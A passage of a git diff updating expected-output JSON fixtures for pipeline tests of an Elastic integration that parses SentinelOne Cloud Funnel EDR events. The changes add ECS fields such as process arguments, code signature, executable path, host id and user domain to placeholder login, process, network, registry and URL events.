",\"event.login.isAdministratorEquivalent\":true,\"agent.version\":\"22.1.2.217\",\"event.login.userName\":\"asdf\",\"src.process.sessionId\":-1,\"src.process.netConnCount\":24905,\"mgmt.osRevision\":\"14393\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.dnsCount\":27,\"event.login.accountDomain\":\"-\",\"endpoint.type\":\"server\",\"trace.id\":\"01GEF7MHHR6BB9SJNBMVFMQP5X\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.indicatorGeneralCount\":0,\"src.process.crossProcessOutOfStorylineCount\":20554,\"src.process.registryChangeCount\":7137,\"packet.id\":\"62A299E57FC84504A7CB0A3EB733C82A\",\"src.process.indicatorPersistenceCount\":0,\"event.type\":\"Login\",\"src.process.indicatorPostExploitationCount\":0,\"event.login.accountSid\":\"S-1-0-0\"}", "type": [ - "info" + "start" ] }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2016Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, @@ -156,6 +158,7 @@ "preserve_duplicate_custom_fields" ], "user": { + "domain": "NTAUTHORITY", "name": "asdf" } } diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json index 2ed926f636b..be042779d73 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json 
@@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "\\??\\C:\\WINDOWS\\system32\\conhost.exe0xffffffff-ForceV1" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "\\??\\C:\\WINDOWS\\system32\\conhost.exe0xffffffff-ForceV1", "entity_id": "08693A26E6783D52", + "executable": "C:\\Windows\\System32\\conhost.exe", "hash": { "md5": "0d698af330fd17bee3bf90011d49251d", "sha1": "52a7274a0b4f9493632060fe25993a2ef24fe827", 
@@ -31,8 +43,13 @@ }, "name": "conhost.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\ranger\\SentinelRanger.exe{\"agentVersion\":\"22.1.4.10010\",\"authToken\":\"jhdskdhkdgdgdahdksaHDKJsdhkNjUifQ.+dVxpFE/Hqs5RGjPczU8DC9i1tw\",\"dataFolder\":\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\ranger\",\"logsFolder\":\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\logs\",\"maxIdleTime\":300,\"sendUnsuccessful\":false,\"url\":\"wss://asdf-123.sentinelone.org\",\"uuid\":\"asdf1234\"}" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\ranger\\SentinelRanger.exe\"\"{\\\"agentVersion\\\":\\\"22.1.4.10010\\\",\\\"authToken\\\":\\\"jhdskdhkdgdgdahdksaHDKJsdhkNjUifQ.+dVxpFE/Hqs5RGjPczU8DC9i1tw\\\",\\\"dataFolder\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\ranger\\\",\\\"logsFolder\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\logs\\\",\\\"maxIdleTime\\\":300,\\\"sendUnsuccessful\\\":false,\\\"url\\\":\\\"wss://asdf-123.sentinelone.org\\\",\\\"uuid\\\":\\\"asdf1234\\\"}", "entity_id": "07693A26E6783D52", + "executable": "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\Ranger\\SentinelRanger.exe", "hash": { "sha1": "a5032d5e80fc742245cb58546c4476e18747f4a0", "sha256": "3b509cfd164bdfe4e330c039745051b8057cc05b8974b1c87e7db7e1fc3eb659" @@ -223,7 +240,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json index fb0652b3b6f..d6febab0717 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json 
+++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json @@ -3,6 +3,7 @@ { "@timestamp": "2022-10-03T15:32:29.466Z", "destination": { + "address": "81.2.69.192", "ip": "81.2.69.192", "port": 443 }, 
@@ -18,7 +19,8 @@ "original": "{\"timestamp\":\"18:32:29.466\",\"src.process.parent.isStorylineRoot\":true,\"event.category\":\"ip\",\"src.process.parent.image.sha1\":\"9037711d20353f0adec0c4558a77f6277dab778b\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"GoogleChrome\",\"src.process.user\":\"asdf\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":18,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":88,\"src.process.parent.name\":\"chrome.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"FILE\",\"sca:atlantisIngestTime\":1664811151704,\"src.process.image.md5\":\"b0bd1ff76f58006d879fee68a1241528\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.storyline.id\":\"738A830FDFF04CF5\",\"src.process.childProcCount\":0,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"TCPV4\",\"src.process.parent.integrityLevel\":\"MEDIUM\",\"src.port.number\":56473,\"event.network.protocolName\":\"https\",\"src.process.indicatorExploitationCount\":1,\"src.process.parent.storyline.id\":\"738A830FDFF04CF5\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"MEDIUM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149466,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"9037711d20353f0adec0c4558a77f6277dab778b\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\PROGRAMFILES(X86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\"dst.port.number\":443,\"src.process.pid\":12952,\"tgt.file.isSigned\":\"signed\",\"sca:inge
stTime\":1664811152,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.publisher\":\"GOOGLELLC\",\"src.process.parent.activeContentType\":\"FILE\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GEF7MB0DMJQHCWR3DZWQY4CF_942\",\"src.process.parent.cmdline\":\"\\\"C:\\\\ProgramFiles(x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\",\"src.process.image.path\":\"C:\\\\PROGRAMFILES(X86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\"src.process.tgtFileModificationCount\":35,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":38,\"event.network.direction\":\"OUTGOING\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":17,\"src.ip.address\":\"81.2.69.192\",\"src.process.startTime\":1664811134954,\"mgmt.id\":\"1337\",\"os.name\":\"Windows10Enterprise\",\"src.process.displayName\":\"GoogleChrome\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":1,\"src.process.uid\":\"778A830FDFF04CF5\",\"src.process.parent.image.md5\":\"b0bd1ff76f58006d879fee68a1241528\",\"event.network.connectionStatus\":\"SUCCESS\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"778A830FDFF04CF5\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.uid\":\"728A830FDFF04CF5\",\"src.process.parent.image.sha256\":\"03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e\",\"src.process.sessionId\":1,\"src.process.netConnCount\":38,\"mgmt.osRevision\":\"19042\",\"dst.ip.address\":\"81.2.69.192\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.
parent.publisher\":\"GOOGLELLC\",\"src.process.parent.startTime\":1664811134640,\"src.process.dnsCount\":39,\"endpoint.type\":\"laptop\",\"trace.id\":\"01GEF7MB0DMJQHCWR3DZWQY4CF\",\"src.process.name\":\"chrome.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.image.sha256\":\"03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e\",\"src.process.indicatorGeneralCount\":15,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"6D359D9ED19C4CB29CC1F1D60B8E556B\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"event.type\":\"IPConnect\",\"event.repetitionCount\":2,\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.activeContent.signedStatus\":\"unsigned\",\"src.process.parent.pid\":11892}", "outcome": "success", "type": [ - "info" + "start", + "connection" ] }, "group": { @@ -26,9 +28,11 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, @@ -37,8 +41,18 @@ "protocol": "https" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "778A830FDFF04CF5", + "executable": "C:\\PROGRAMFILES(X86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "b0bd1ff76f58006d879fee68a1241528", "sha1": "9037711d20353f0adec0c4558a77f6277dab778b", 
@@ -46,8 +60,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe", "entity_id": "728A830FDFF04CF5", + "executable": "C:\\PROGRAMFILES(X86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "sha1": "9037711d20353f0adec0c4558a77f6277dab778b", "sha256": "03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e" @@ -257,7 +276,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json index bca6f4f0255..d9931ba018a 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "start" + ], "category": [ "process" ], 
@@ -13,7 +16,7 @@ "kind": "event", "original": "{\"timestamp\":\"18:32:29.470\",\"tgt.process.displayName\":\"nr-winpkg.exe\",\"src.process.parent.isStorylineRoot\":false,\"event.category\":\"process\",\"src.process.parent.image.sha1\":\"9ef7039dadb490762d4446892b1c0323f06bd1c2\",\"site.id\":\"123456789123456789\",\"src.process.parent.displayName\":\"Test123\",\"src.process.image.binaryIsExecutable\":true,\"tgt.process.storyline.id\":\"F8C44B7A0C80D2E7\",\"tgt.process.isNative64Bit\":false,\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":5621,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":216402,\"src.process.parent.name\":\"newrelic-infra-service.exe\",\"i.version\":\"preprocess-lib-1.0\",\"sca:atlantisIngestTime\":1664811195133,\"src.process.image.md5\":\"7c99f420f8985a4ccf428f9fe2b090f0\",\"src.process.indicatorReconnaissanceCount\":4179,\"src.process.storyline.id\":\"F8C44B7A0C80D2E7\",\"src.process.childProcCount\":67359,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"tgt.process.subsystem\":\"SYS_WIN32\",\"src.process.crossProcessOpenProcessCount\":0,\"tgt.process.image.binaryIsExecutable\":true,\"tgt.process.image.sha256\":\"b00b5e5d4e268b8dbd0af0749edb6626e686403c71f1c81ae08d18242046f29e\",\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"PROCESSCREATION\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"tgt.process.publisher\":\"NEWRELIC,INC.\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.storyline.id\":\"F8C44B7A0C80D2E7\",\"tgt.process.verifiedStatus\":\"verified\",\"tgt.process.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-integrations\\\\nr-winpkg.exe\",\"src.process.integrityLevel\":\"SYSTEM\",\"i.scheme\":\"edr\",\"tgt.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.proces
s.netConnInCount\":1,\"tgt.process.image.md5\":\"65f9131df4b7c909ae41add0fcd172fa\",\"event.time\":1664811149470,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"7f3981d9bf5d134065541387a77b9f651471fa0f\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra-service.exe\",\"src.process.pid\":3596,\"tgt.file.isSigned\":\"signed\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.publisher\":\"NEWRELIC,INC.\",\"sca:ingestTime\":1664811195,\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"a1d7ac9e15c26535a7dec40bba21cda4de078504\",\"src.process.crossProcessCount\":0,\"src.process.signedStatus\":\"signed\",\"event.id\":\"01GEF7NPDYKJDP1X0XSQ9K7J2N_41\",\"src.process.parent.cmdline\":\"\\\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra-service.exe\\\"\",\"src.process.image.path\":\"C:\\\\ProgramFiles\\\\NewRelic\\\\newrelic-infra\\\\newrelic-infra.exe\",\"src.process.tgtFileModificationCount\":516119,\"src.process.indicatorEvasionCount\":2100,\"src.process.netConnOutCount\":7330,\"tgt.process.pid\":4720,\"src.process.crossProcessDupThreadHandleCount\":0,\"tgt.process.name\":\"nr-winpkg.exe\",\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":5621,\"tgt.process.signedStatus\":\"signed\",\"src.process.startTime\":1662784606181,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Datacenter\",\"tgt.process.cmdline\":\"./nr-winpkg\",\"src.process.displayName\":\"newrelic-infra.exe\",\"src.process.parent.sessionId\":0,\"src.process.isNative64Bit\":false,\"src.process.uid\":\"F59445BAF5BC03DA\",\"src.process.parent.image.md5\":\"8c3eb2770d8eed24ce33d77f7668fe
a5\",\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"D0046CBAF5BC03DA\",\"tgt.process.uid\":\"D0046CBAF5BC03DA\",\"tgt.process.isStorylineRoot\":false,\"src.process.parent.uid\":\"C19445BAF5BC03DA\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.image.sha256\":\"f62c2d5c9e7605c75a0c8fcb9c2b506267ca0e6706766e033495d81dac4e302c\",\"src.process.sessionId\":0,\"src.process.netConnCount\":7331,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"tgt.process.startTime\":1664811149464,\"src.process.parent.publisher\":\"NEWRELIC,INC.\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.startTime\":1662784605701,\"src.process.dnsCount\":565,\"endpoint.type\":\"server\",\"trace.id\":\"01GEF7NPDYKJDP1X0XSQ9K7J2N\",\"src.process.name\":\"newrelic-infra.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.image.sha256\":\"058043b4d2b74a31dda6966a7a0c292a04e898bd4dabaefdc6b0eabf518c40d1\",\"tgt.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorGeneralCount\":4180,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":146,\"packet.id\":\"62D7376456284C24A2067FE50BA5B7D7\",\"tgt.process.sessionId\":0,\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"tgt.process.isRedirectCmdProcessor\":false,\"event.type\":\"ProcessCreation\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":3132}", "type": [ - "info" + "start" ] }, "group": { 
@@ -21,15 +24,22 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, "process": { + "args": [ + "./nr-winpkg" + ], + "args_count": 1, "command_line": "./nr-winpkg", "entity_id": "D0046CBAF5BC03DA", + "executable": "C:\\ProgramFiles\\NewRelic\\newrelic-infra\\newrelic-integrations\\nr-winpkg.exe", "hash": { "md5": "65f9131df4b7c909ae41add0fcd172fa", "sha1": "a1d7ac9e15c26535a7dec40bba21cda4de078504", @@ -37,8 +47,18 @@ }, "name": "nr-winpkg.exe", "parent": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "NEWRELIC,INC.", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "F59445BAF5BC03DA", + "executable": "C:\\ProgramFiles\\NewRelic\\newrelic-infra\\newrelic-infra.exe", "hash": { "md5": "7c99f420f8985a4ccf428f9fe2b090f0", "sha1": "7f3981d9bf5d134065541387a77b9f651471fa0f", @@ -257,7 +277,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json index 19b0cc3aa3b..2c775afeaed 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-registry.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "creation" + ], "category": [ "registry" ], 
@@ -21,15 +24,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows7Professional", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "7A5B258D66B11991", + "executable": "C:\\Windows\\system32\\svchost.exe", "hash": { "md5": "c78655bc80301d76ed4fef1c1ea40a7d", "sha1": "619652b42afe5fb0e3719d7aeda7a5494ab193e8", @@ -37,8 +52,13 @@ }, "name": "svchost.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\services.exe", "entity_id": "55A75E7FE942CE7D", + "executable": "C:\\Windows\\system32\\services.exe", "hash": { "sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536" 
@@ -59,7 +79,12 @@ } }, "registry": { - "key": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000\\Type" + "data": { + "type": "BINARY" + }, + "key": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000", + "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\##?#PCI#VEN_10EE&DEV_0300&SUBSYS_044D173E&REV_00#4&353c0d9e&0&20F0#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\#Topology\\Properties\\{d1885396-39d8-4777-bcff-5e3241483416}\\00000000\\00000000\\Type", + "value": "Type" }, "related": { "hash": [ @@ -235,7 +260,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json index 8b0318f6a69..59b7613cec9 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-scheduled-task.log-expected.json 
@@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "LENOVO", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "0AF3AD1313577E13", + "executable": "C:\\Windows\\Lenovo\\ImController\\Service\\Lenovo.Modern.ImController.exe", "hash": { "md5": "9b86c2a9ff7b8e697a9bbe015d4c9d0e", "sha1": "c364f32c9df2fb147131618b9793346ae5d8f745", @@ -31,8 +43,13 @@ }, "name": "Lenovo.Modern.ImController.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\services.exe", "entity_id": "2AF2AD1313577E13", + "executable": "C:\\Windows\\System32\\services.exe", "hash": { "sha1": "d7a213f3cfee2a8a191769eb33847953be51de54", "sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" @@ -287,7 +304,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json index a9b37fbdada..c59d97a5e87 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-threat-intelligence-indicator.log-expected.json 
@@ -21,15 +21,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Linux", - "platform": "linux" + "platform": "linux", + "type": "linux" }, "type": "server" }, "process": { + "args": [ + "-D" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "-D", "entity_id": "09edcd06-faa9-1575-1f8b-46a5ad0ac0fe", + "executable": "/usr/sbin/sshd", "hash": { "sha1": "4fe13081b31b55176af7dee8354ea18ad3ca4c59" }, @@ -183,7 +193,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "root", + "name": "root" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json index d8c2c5afca4..a80d672d915 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-url.log-expected.json @@ -2,6 +2,13 @@ "expected": [ { "@timestamp": "2022-10-03T15:32:29.475Z", + "destination": { + "address": "www.asdf.com", + "domain": "www.asdf.com", + "registered_domain": "asdf.com", + "subdomain": "www", + "top_level_domain": "com" + }, "ecs": { "version": "8.11.0" }, 
@@ -15,15 +22,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "E1471D24880BECFA", + "executable": "C:\\MetSrc\\sourcelink5.exe", "hash": { "md5": "ac5ebf6878c1226542453aea56e451a2", "sha1": "186fdd875432f3af106eb973fbc871240f35964e", @@ -31,8 +48,13 @@ }, "name": "sourcelink5.exe", "parent": { + "args": [ + "C:\\MetSrc\\nssm.exe" + ], + "args_count": 1, "command_line": "C:\\MetSrc\\nssm.exe", "entity_id": "632D1A24880BECFA", + "executable": "C:\\MetSrc\\nssm.exe", "hash": { "sha1": "47c112c23c7bdf2af24a20bd512f91ff6af76bc6", "sha256": "f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97" @@ -221,7 +243,13 @@ "preserve_duplicate_custom_fields" ], "url": { - "original": "http://www.asdf.com" + "domain": "www.asdf.com", + "original": "http://www.asdf.com", + "scheme": "http" + }, + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" } } ] diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml index b62cb1da528..fb0f64039a6 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/default.yml 
